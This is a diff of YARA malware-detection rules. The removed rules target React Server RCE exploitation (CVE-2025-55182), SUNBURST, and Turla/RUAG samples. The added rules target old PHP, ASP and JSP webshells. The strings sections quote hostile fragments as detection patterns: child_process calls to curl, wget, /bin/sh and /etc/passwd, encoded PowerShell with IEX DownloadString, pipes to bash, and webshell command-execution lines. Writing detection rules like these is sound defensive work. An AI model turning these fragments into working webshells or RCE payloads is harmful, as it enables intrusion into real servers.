-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/react_pocs_indicators_dec25.yar#L70-L82"
+		description = "Semi-Auto-generated  - file backdoorfr.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "5ba2b617-a873-5e80-9cfc-c61cc8d605f3"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4866-L4877"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6e5d809cd436935324ad4cb657a66a1c257df13a8dd52ee5db1b803ad24560b3"
-		score = 65
+		hash = "91e4afc7444ed258640e85bcaf0fecfc"
+		logic_hash = "40a6fb41a65fd35acb7cdc36fdda90f5dc54b641adc3ba9eaae29c5e46622206"
+		score = 75
 		quality = 85
-		tags = "CVE-2025-55182, CVE-2025-66478"
+		tags = ""
 
 	strings:
-		$s1 = "[Error: NEXT_REDIRECT]"
-		$s2 = "digest: 'uid=0(root) gid=0(root)"
+		$s1 = "www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tan"
+		$s2 = "print(\"<br>Provenance du mail : <input type=\\\"text\\\" name=\\\"provenanc"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_EXPL_SUSP_JS_POC_Dec25 : CVE_2025_55182 FILE
+rule SIGNATURE_BASE_Aspydrv_Asp
 {
 	meta:
-		description = "Detects RCE indicators related to the proof-of-concept code for the React Server Remote Code Execution Vulnerability (CVE-2025-55182) but could be used in other JavaScript based PoC code as well"
-		author = "Florian Roth"
-		id = "83ef1573-b35b-51c6-8342-68ce2ac577de"
-		date = "2025-12-05"
-		modified = "2025-12-06"
-		reference = "https://github.com/msanft/CVE-2025-55182/blob/main/poc.py"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/react_pocs_indicators_dec25.yar#L84-L98"
+		description = "Semi-Auto-generated  - file aspydrv.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "4420d13e-7015-5083-ba08-b41bf28b00c2"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4878-L4891"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "142749ac6538d80a9c713eb19b763063e4d788e622f4938ecd0c1edbf51b3c74"
-		score = 70
-		quality = 60
-		tags = "CVE-2025-55182, FILE"
+		hash = "1c01f8a88baee39aa1cebec644bbcb99"
+		logic_hash = "64912d7521d4bff33b5f3a78525bf4ed94246f5933753bed7ca02bedffc85f0f"
+		score = 60
+		quality = 85
+		tags = ""
 
 	strings:
-		$xr1 = /process\.mainModule\.require\(["']child_process["']\).{5,40}\(["'](whoami|powershell|\/bin\/sh|\/bin\/bash|wget|curl|cat \/etc\/passwd|uname|id["'])/
+		$s0 = "If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))"
+		$s1 = "password"
+		$s2 = "session(\"shagman\")="
 
 	condition:
-		1 of them and not uint16( 0 ) == 0x3c3f
+		2 of them
 }
-rule SIGNATURE_BASE_EXPL_SUSP_JS_POC_RSC_Detector_Payloads_Dec25 : CVE_2025_55182
+rule SIGNATURE_BASE_Cmdjsp_Jsp
 {
 	meta:
-		description = "Detects RCE indicators related to the proof-of-concept code for the React Server Remote Code Execution Vulnerability (CVE-2025-55182) as used in the RSC Detector browser extension but could be used in other JavaScript based PoC code as well"
-		author = "Florian Roth"
-		id = "62cc724e-f8eb-50d7-97f7-a63d74490eb3"
-		date = "2025-12-06"
-		modified = "2025-12-12"
-		reference = "https://github.com/mrknow001/RSC_Detector"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/react_pocs_indicators_dec25.yar#L100-L116"
+		description = "Semi-Auto-generated  - file cmdjsp.jsp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "048478a8-9622-54c7-80ed-e4e223d14500"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4892-L4905"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b51f4028662795ffcbf4c17c1b2cbad35a8fa64104aa5cfdaf24b13e9663eb09"
-		score = 70
+		hash = "b815611cc39f17f05a73444d699341d4"
+		logic_hash = "8b0e425c7d71ea2c536192ff186665e7f0fbdbc0e0d195d7107ac57cf9bd1773"
+		score = 75
 		quality = 85
-		tags = "CVE-2025-55182"
+		tags = ""
 
 	strings:
-		$s1 = "process.mainModule.require('child_process').execSync("
-		$s2 = ").toString('base64');"
-		$f1 = "echo vulnerability_test"
+		$s0 = "// note that linux = cmd and windows = \"cmd.exe /c + cmd\" " fullword
+		$s1 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /C \" + cmd);" fullword
+		$s2 = "cmdjsp.jsp"
+		$s3 = "michaeldaw.org" fullword
 
 	condition:
-		all of ( $s* ) and not 1 of ( $f* )
+		2 of them
 }
-rule SIGNATURE_BASE_EXPL_SUSP_JS_Exploitation_Payloads_Dec25 : CVE_2025_55182
+rule SIGNATURE_BASE_H4Ntu_Shell__Powered_By_Tsoi_
 {
 	meta:
-		description = "Detects RCE indicators related to the exploitation attempts of the React Server Remote Code Execution Vulnerability (CVE-2025-55182) as observed in the wild"
-		author = "Florian Roth"
-		id = "341c955d-9ab1-5c3a-9f84-93c2a50b596e"
-		date = "2025-12-06"
-		modified = "2025-12-12"
-		reference = "https://www.greynoise.io/blog/cve-2025-55182-react2shell-opportunistic-exploitation-in-the-wild-what-the-greynoise-observation-grid-is-seeing-so-far"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/react_pocs_indicators_dec25.yar#L118-L157"
+		description = "Semi-Auto-generated  - file h4ntu shell [powered by tsoi].txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "186358e6-88a3-5fad-b1ba-a49b2a5dea1c"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4906-L4917"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6ddad54b8869ff3eadc3040767ef4cac5a81132b74a5d16cfe479a8dddd52a65"
-		score = 70
-		quality = 60
-		tags = "CVE-2025-55182"
+		hash = "06ed0b2398f8096f1bebf092d0526137"
+		logic_hash = "32c620a4ed3f7a8640928e2211516978c12cfbdedb7d96e923303740407b5a1c"
+		score = 75
+		quality = 85
+		tags = ""
 
 	strings:
-		$a1 = "process.mainModule.require('child_process')"
-		$x1 = ".execSync('powershell -enc SQBFAFgAIAA"
-		$sa1 = ".execSync('powershell"
-		$sa2 = ".execSync('curl "
-		$sa3 = ".execSync('wget "
-		$sb01 = " -e "
-		$sb02 = " -ec "
-		$sb03 = " -en "
-		$sb04 = " -enc "
-		$sb05 = " -enco "
-		$sb06 = " -encodedcommand "
-		$sb07 = " | bash"
-		$sb08 = " | sh"
-		$sb09 = "|bash"
-		$sb10 = "|sh"
-		$sc1 = ").DownloadString(" ascii wide base64
-		$sc2 = "IEX (New-Object " ascii wide base64
+		$s0 = "h4ntu shell"
+		$s1 = "system(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");"
 
 	condition:
-		$a1 and ( 1 of ( $x* ) or ( 1 of ( $sa* ) and 1 of ( $sb* ) ) or 1 of ( $sc* ) )
+		1 of them
 }
-rule SIGNATURE_BASE_APT_Fnv1A_Plus_Extra_XOR_In_MSIL_Experimental : FILE
+rule SIGNATURE_BASE_Ajan_Asp
 {
 	meta:
-		description = "This rule detects the specific MSIL implementation of fnv1a of the SUNBURST backdoor (standard fnv1a + one final XOR before RET) independent of the XOR-string. (fnv64a_offset and fnv64a_prime are standard constants in the fnv1a hashing algorithm.)"
-		author = "Arnim Rupp"
-		id = "5505f7ff-eca5-5274-bdd1-dbbd648c3ccc"
-		date = "2020-12-22"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_backdoor_sunburst_fnv1a_experimental.yar#L2-L24"
+		description = "Semi-Auto-generated  - file Ajan.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "6040fd88-b992-5110-8b37-7711ace30b1a"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4918-L4930"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6db212b21fec8d2c1b4cff9e32bdc027835ed660e7552b49f4418e7d0b35ca11"
-		score = 50
+		hash = "b6f468252407efc2318639da22b08af0"
+		logic_hash = "13988af864a62ca04501288d4f2d830815ab453b14cef6795fe993db1dd1a9ef"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77"
-		hash2 = "ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6"
-		hash3 = "019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134"
+		tags = ""
 
 	strings:
-		$fnv64a_offset = { 25 23 22 84 e4 9c f2 cb }
-		$fnv64a_prime_plus_gap_plus_xor_ret = { B3 01 00 00 00 01 [8-40] 61 2A 00 00 }
+		$s1 = "c:\\downloaded.zip"
+		$s2 = "Set entrika = entrika.CreateTextFile(\"c:\\net.vbs\", True)" fullword
+		$s3 = "http://www35.websamba.com/cybervurgun/"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Typical_Malware_String_Transforms : FILE
+rule SIGNATURE_BASE_PHANTASMA_Php
 {
 	meta:
-		description = "Detects typical strings in a reversed or otherwise modified form"
-		author = "Florian Roth (Nextron Systems)"
-		id = "86f348b5-0564-5d83-bbea-4f4a5f62fd30"
-		date = "2016-07-31"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_transformed_strings.yar#L10-L56"
+		description = "Semi-Auto-generated  - file PHANTASMA.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "21ff4cee-9cdc-57d1-9c43-e033fdb47de0"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4931-L4944"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1d3813e0d20b82ceda56d03589bb944f747dfe931396ed514fb6b36f72f98c26"
-		score = 60
-		quality = 83
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash = "52779a27fa377ae404761a7ce76a5da7"
+		logic_hash = "d4a2a1bcc1ff3264b35f2b05d7de664b56807977f2a793fd87206f046a185d3b"
+		score = 75
+		quality = 85
+		tags = ""
 
 	strings:
-		$e1 = "exe.tsohcvs" fullword ascii
-		$e2 = "exe.ssasl" fullword ascii
-		$e3 = "exe.rerolpxe" fullword ascii
-		$e4 = "exe.erolpxei" fullword ascii
-		$e5 = "exe.23lldnur" fullword ascii
-		$e6 = "exe.dmc" fullword ascii
-		$e7 = "exe.llikksat" fullword ascii
-		$l1 = "lld.23lenreK" fullword ascii
-		$l2 = "lld.ESABLENREK" fullword ascii
-		$l3 = "lld.esabtpyrc" fullword ascii
-		$l4 = "lld.trcvsm" fullword ascii
-		$l5 = "LLD.LLDTN" fullword ascii
-		$i1 = "paeHssecorPteG" fullword ascii
-		$i2 = "sserddAcorPteG" fullword ascii
-		$i3 = "AyrarbiLdaoL" fullword ascii
-		$i4 = "AssecorPetaerC" fullword ascii
-		$r1 = "teSlortnoCtnerruC" fullword ascii
-		$r2 = "nuR\\noisreVtnerruC" fullword ascii
-		$f1 = "\\23metsys\\" ascii
-		$f2 = "\\23metsyS\\" ascii
-		$f3 = "niB.elcyceR$" fullword ascii
-		$f4 = "%tooRmetsyS%" fullword ascii
-		$fp1 = "Application Impact Telemetry Static Analyzer" fullword wide
+		$s0 = ">[*] Safemode Mode Run</DIV>"
+		$s1 = "$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&see=$file>$file</a><br>"
+		$s2 = "[*] Spawning Shell"
+		$s3 = "Cha0s"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 1 of them and not 1 of ( $fp* ) )
+		2 of them
 }
-rule SIGNATURE_BASE_EXT_SUSP_OBFUSC_Macos_Roothelper_Obfuscated : FILE
+rule SIGNATURE_BASE_Mysql_Web_Interface_Version_0_8_Php
 {
 	meta:
-		description = "Yara for the public tool 'roothelper'. Used by XCSSET (https://gist.github.com/NullArray/f39b026b9e0d19f1e17390a244d679ec)"
-		author = "im0prtp3"
-		id = "7ff91c00-8178-525c-bb41-d09cf7cda588"
-		date = "2021-06-07"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/imp0rtp3/status/1401912205621202944"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_hktl_roothelper.yar#L2-L55"
+		description = "Semi-Auto-generated  - file MySQL Web Interface Version 0.8.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "90616d2d-082b-5983-a859-62d1c5b8066e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4945-L4958"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2121de0409f3f8e4c4e079944efb605776e0475cadc25607eb888cc6461ecaf3"
-		score = 65
-		quality = 83
-		tags = "FILE"
+		hash = "36d4f34d0a22080f47bb1cb94107c60f"
+		logic_hash = "f0a20870a3240948e3ef1ad61685b00c5fc90d6098b87af9ac43ab44ccd13c9e"
+		score = 75
+		quality = 85
+		tags = ""
 
 	strings:
-		$a1 = "E: neither argv[0] nor $_ works." fullword
-		$b1 = "shll=%s\n" fullword
-		$b2 = "argv[%d]=%.60s\n" fullword
-		$b3 = "getenv(%s)=%s\n" fullword
-		$b4 = "argc=%d\n" fullword
-		$b5 = "argv=<null>\n" fullword
-		$c1 = "%s%s%s: %s\n" fullword
-		$c2 = "x%lx" fullword
-		$c3 = "=%lu %d" fullword
-		$c4 = "%lu %d%c" fullword
-		$f1 = "rmarg"
-		$f2 = "chkenv"
-		$f3 = "untraceable"
-		$f4 = "arc4"
-		$f6 = "stte"
-		$f7 = "with_file"
-		$opcodes_1 = { 99 F7 7D ?? 4C 63 C2 42 0F B6 14 01 0F B6 3D }
-		$opcodes_2 = { C6 [3] 00 00 00 C6 [3] 00 00 00 C6 [3] 00 00 00 8A 05 [2] 00 00 0F B6 [3] 00 00 89 CA }
-		$opcodes_3 = { E8 [2] FF FF	8B 85 ?? F? FF FF 2B 85 ?? F? FF FF	83 ?? 01 89 85 ?? F? FF FF E9 ?? 00 00 00 }
-		$weak_opcodes_1 = {48 8B 45 ?? 48 8B 00 48 3B 45 ??	0F 95 C1 88 4D ??}
-		$weak_opcodes_2 = {	48 8B 45 ??	48 83 38 ??	0F 95 C1 88 4D ?? }
+		$s0 = "SooMin Kim"
+		$s1 = "http://popeye.snu.ac.kr/~smkim/mysql"
+		$s2 = "href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename"
+		$s3 = "<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofi"
 
 	condition:
-		( uint32( 0 ) == 0xfeedface or uint32( 0 ) == 0xcefaedfe or uint32( 0 ) == 0xfeedfacf or uint32( 0 ) == 0xcffaedfe or uint32( 0 ) == 0xcafebabe or uint32( 0 ) == 0xbebafeca ) and ( $a1 or 3 of ( $b* ) or 5 of ( $f* ) or all of ( $opcodes* ) or ( 2 of ( $b* ) and ( 2 of ( $c* ) or 2 of ( $opcodes* ) ) ) or ( 3 of ( $c* ) and 4 of ( $f* ) ) or ( 2 of ( $opcodes* ) and ( all of ( $weak_opcodes* ) or 3 of ( $c* ) ) ) )
+		2 of them
 }
-rule SIGNATURE_BASE_Turla_APT_Srsvc : TURLA FILE
+rule SIGNATURE_BASE_Simple_Cmd_Html
 {
 	meta:
-		description = "Detects Turla malware (based on sample used in the RUAG APT case)"
-		author = "Florian Roth (Nextron Systems)"
-		id = "951ee9f8-1ab0-5fd5-be9b-053ec82f6ea2"
-		date = "2016-06-09"
-		modified = "2023-12-05"
-		reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla.yar#L10-L31"
+		description = "Semi-Auto-generated  - file simple_cmd.html.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "30990574-02a0-5eed-8317-847b6be13300"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4959-L4972"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "76bd2aacde66114090d1c1767da64728219230964a0bc78a5d830819c46bac3a"
+		hash = "c6381412df74dbf3bcd5a2b31522b544"
+		logic_hash = "56b5b9e5518fa8a4be8c48735e997a538b0e534ad8fd72c1419dc0e8353bbc00"
 		score = 75
 		quality = 85
-		tags = "TURLA, FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		family = "Turla"
-		hash1 = "65996f266166dbb479a42a15a236e6564f0b322d5d68ee546244d7740a21b8f7"
-		hash2 = "25c7ff1eb16984a741948f2ec675ab122869b6edea3691b01d69842a53aa3bac"
+		tags = ""
 
 	strings:
-		$x1 = "SVCHostServiceDll.dll" fullword ascii
-		$s2 = "msimghlp.dll" fullword wide
-		$s3 = "srservice" fullword wide
-		$s4 = "ModStart" fullword ascii
-		$s5 = "ModStop" fullword ascii
+		$s1 = "<title>G-Security Webshell</title>" fullword
+		$s2 = "<input type=TEXT name=\"-cmd\" size=64 value=\"<?=$cmd?>\" " fullword
+		$s3 = "<? if($cmd != \"\") print Shell_Exec($cmd);?>" fullword
+		$s4 = "<? $cmd = $_REQUEST[\"-cmd\"];?>" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 20KB and ( 1 of ( $x* ) or all of ( $s* ) ) ) or ( all of them )
+		all of them
 }
-rule SIGNATURE_BASE_Turla_APT_Malware_Gen1 : TURLA FILE
+rule SIGNATURE_BASE__1_C2007_Php_Php_C100_Php
 {
 	meta:
-		description = "Detects Turla malware (based on sample used in the RUAG APT case)"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7ead2da1-3544-5a26-8767-6d3f29de8b96"
-		date = "2016-06-09"
-		modified = "2023-12-05"
-		reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla.yar#L33-L71"
+		description = "Semi-Auto-generated  - from files 1.txt, c2007.php.php.txt, c100.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "00ada6a4-a32a-5184-867d-e10a8c95c41c"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4973-L4987"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3676d01d5e4044fd49292eb7b4376ff90f0a41141f89a19b13c5518b01257be3"
+		logic_hash = "6f6cb7c210bcd0f84c2ccff52850b1d673622ae49b83d614d63b5bbba7392327"
 		score = 75
 		quality = 85
-		tags = "TURLA, FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		family = "Turla"
-		hash1 = "0e1bf347c37fb199886f1e675e372ba55ac4627e8be2f05a76c2c64f9b6ed0e4"
-		hash2 = "7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9"
-		hash3 = "fe3ffd7438c0d38484bf02a78a19ea81a6f51b4b3f2b2228bd21974c2538bbcd"
-		hash4 = "c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4"
-		hash5 = "b62a643c96e2e41f639d2a8ce11d61e6b9d7fb3a9baf011120b7fec1b4ee3cf4"
-		hash6 = "edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348"
-		hash7 = "8f2ea0f916fda1dfb771f5441e919c561da5b6334b9f2fffcbf53db14063b24a"
-		hash8 = "8dddc744bbfcf215346c812aa569e49523996f73a1f22fe4e688084ce1225b98"
-		hash9 = "0c69258adcc97632b729e55664c22cd942812336d41e8ea0cff9ddcafaded20f"
-		hash10 = "2b4fba1ef06f85d1395945db40a9f2c3b3ed81b56fb9c2d5e5bb693c230215e2"
+		tags = ""
+		super_rule = 1
+		hash0 = "44542e5c3e9790815c49d5f9beffbbf2"
+		hash1 = "d089e7168373a0634e1ac18c0ee00085"
+		hash2 = "38fd7e45f9c11a37463c3ded1c76af4c"
 
 	strings:
-		$x1 = "too long data for this type of transport" fullword ascii
-		$x2 = "not enough server resources to complete operation" fullword ascii
-		$x3 = "Task not execute. Arg file failed." fullword ascii
-		$x4 = "Global\\MSCTF.Shared.MUTEX.ZRX" fullword ascii
-		$s1 = "peer has closed the connection" fullword ascii
-		$s2 = "tcpdump.exe" fullword ascii
-		$s3 = "windump.exe" fullword ascii
-		$s4 = "dsniff.exe" fullword ascii
-		$s5 = "wireshark.exe" fullword ascii
-		$s6 = "ethereal.exe" fullword ascii
-		$s7 = "snoop.exe" fullword ascii
-		$s8 = "ettercap.exe" fullword ascii
-		$s9 = "miniport.dat" fullword ascii
-		$s10 = "net_password=%s" fullword ascii
+		$s0 = "echo \"<b>Changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\""
+		$s3 = "echo \"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 2 of ( $x* ) or 8 of ( $s* ) ) ) or ( 12 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_RUAG_APT_Malware_Gen2 : FILE
+rule SIGNATURE_BASE__Nst_Php_Php_Img_Php_Php_Nstview_Php_Php
 {
 	meta:
-		description = "Detects malware used in the RUAG APT case"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8a50e5d5-f16d-53c7-825c-a8e51c207eac"
-		date = "2016-06-09"
-		modified = "2023-01-06"
-		reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla.yar#L73-L108"
+		description = "Semi-Auto-generated  - from files nst.php.php.txt, img.php.php.txt, nstview.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "238242f5-4e57-5edb-8806-ea5e06f1f637"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4988-L5003"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "62c65a5c85930dd2a928508401113ffba28bc6a07188d9bf5c68234bea10e1aa"
-		score = 90
+		logic_hash = "b1e13f75edbbc8f9263e0e516a54330ce57190ba0b45813dad4bafeaeefa389b"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "0e1bf347c37fb199886f1e675e372ba55ac4627e8be2f05a76c2c64f9b6ed0e4"
-		hash2 = "7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9"
-		hash3 = "fe3ffd7438c0d38484bf02a78a19ea81a6f51b4b3f2b2228bd21974c2538bbcd"
-		hash4 = "c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4"
+		tags = ""
+		super_rule = 1
+		hash0 = "ddaf9f1986d17284de83a17fe5f9fd94"
+		hash1 = "17a07bb84e137b8aa60f87cd6bfab748"
+		hash2 = "4745d510fed4378e4b1730f56f25e569"
 
 	strings:
-		$x1 = "Internal command not support =((" ascii
-		$x2 = "L|-1|AS_CUR_USER:OpenProcessToken():%d, %s|" fullword ascii
-		$x3 = "L|-1|CreateProcessAsUser():%d, %s|" fullword ascii
-		$x4 = "AS_CUR_USER:OpenProcessToken():%d" fullword ascii
-		$x5 = "L|-1|AS_CUR_USER:LogonUser():%d, %s|" fullword ascii
-		$x6 = "L|-1|try to run dll %s with user priv|" fullword ascii
-		$x7 = "\\\\.\\Global\\PIPE\\sdlrpc" fullword ascii
-		$x8 = "\\\\%s\\pipe\\comnode" fullword ascii
-		$x9 = "Plugin dll stop failed." fullword ascii
-		$x10 = "AS_USER:LogonUser():%d" fullword ascii
-		$s1 = "MSIMGHLP.DLL" fullword wide
-		$s2 = "msimghlp.dll" fullword ascii
-		$s3 = "ximarsh.dll" fullword ascii
-		$s4 = "msximl.dll" fullword ascii
-		$s5 = "INTERNAL.dll" fullword ascii
-		$s6 = "\\\\.\\Global\\PIPE\\" ascii
-		$s7 = "ieuser.exe" fullword ascii
+		$s0 = "<tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><i"
+		$s1 = "$perl_proxy_scp = \"IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4v"
+		$s2 = "<tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) or 5 of ( $s* ) ) ) or ( 10 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Turla_APT_Malware_Gen3 : TURLA FILE
+rule SIGNATURE_BASE__Network_Php_Php_Xinfo_Php_Php_Nfm_Php_Php
 {
 	meta:
-		description = "Detects Turla malware (based on sample used in the RUAG APT case)"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8cb7d873-e4f9-553e-84e8-dbc0d31f65ab"
-		date = "2016-06-09"
-		modified = "2023-12-05"
-		reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla.yar#L110-L150"
+		description = "Semi-Auto-generated  - from files network.php.php.txt, xinfo.php.php.txt, nfm.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "4fd11db6-902d-5f1a-96c5-9dfcccce7488"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5004-L5018"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8c24cf71841efc974c8a4d8eb5662137592c1d454821c9beadc50d83cb19333c"
+		logic_hash = "913ff19b6448d3b074440c2a5f85d85813fdf010d33dc57c89ba1e5db6455e11"
 		score = 75
 		quality = 85
-		tags = "TURLA, FILE"
